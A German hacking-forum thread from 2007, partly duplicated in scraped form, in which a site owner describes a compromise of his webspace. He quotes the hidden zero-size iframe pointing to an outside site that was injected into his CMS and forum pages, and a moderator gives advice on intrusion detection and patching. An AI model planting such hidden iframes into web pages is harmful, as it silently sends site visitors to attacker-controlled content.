[HaBo]

stone.dr · 20.05.07, 14:58

Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war.
So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.

Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.

In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:

Code:

html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Der code ist c.a. 10 mal "eingebaut"

Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.

Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.

Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... :( )

**Elderan** · 20.05.07, 18:20

Hallo,
das Beste ist eine (externe) IDS und ein externer Logfile-Server. Mit diesen beiden Mitteln kann man eigentlich sehr schnell ausmachen, was die Ursache dafür war (sofern man es nicht mit einem sehr guten Cracker zu tun hat), woher er kam, welche Lücken er ausgenutzt hat etc.

Da du aber nur Webspace hast, wird das wohl schwer.
Naja sonst evt. mal die PHP Version überprüfen, ob es die neuste ist, weil der März (?) ja der Month of PHP Bugs war, und evt. fährst du noch mit einer alten, unsicheren Version.

Dann als nächstest überprüfen, ob dass CMS, die Boards, Confixx und ähnliches Lücken aufweisen die bekannt sind und evt. auf den neusten Stand bringen.

PS: Was macht man denn schon um 5 Uhr morgens??

Anzeige

- Anzeige -

20.05.07, 14:58	#1 (permalink)
stone.dr Registriert seit: 25.12.04 Likes: 0	Wurm legt ganzen Webspace lahm Anzeige Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war. So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren. Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören. Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar. In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht: Code: html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html> Der code ist c.a. 10 mal "eingebaut" Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab. Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war. Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen. Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam? Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace). Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt. Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... :( )

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Firefox 3 legt einen "Desktop" Ordner an	xeno	Applikationen	8	17.08.08 14:53
Microsoft legt Schnittstellen offen	lBr1anl	News & Ankündigungen	16	24.02.08 12:42
Bootproblem (kaputter PC legt Zweitpc lahm und läuft anschließend wieder)	da_jupp	Die Problemzone	0	28.06.07 15:58
Virus der den CPU-Lüfter lahm legt???	Cracker	Die Problemzone	6	02.07.05 21:13
Wurm legt Teile des Internet lahm	Mackz	News & Ankündigungen	0	25.01.03 20:07

20.05.07, 18:20	#2 (permalink)
Elderan Moderator Registriert seit: 30.03.04 Likes: 14	Hallo, das Beste ist eine (externe) IDS und ein externer Logfile-Server. Mit diesen beiden Mitteln kann man eigentlich sehr schnell ausmachen, was die Ursache dafür war (sofern man es nicht mit einem sehr guten Cracker zu tun hat), woher er kam, welche Lücken er ausgenutzt hat etc. Da du aber nur Webspace hast, wird das wohl schwer. Naja sonst evt. mal die PHP Version überprüfen, ob es die neuste ist, weil der März (?) ja der Month of PHP Bugs war, und evt. fährst du noch mit einer alten, unsicheren Version. Dann als nächstest überprüfen, ob dass CMS, die Boards, Confixx und ähnliches Lücken aufweisen die bekannt sind und evt. auf den neusten Stand bringen. PS: Was macht man denn schon um 5 Uhr morgens??

[HaBo]

Wurm legt ganzen Webspace lahm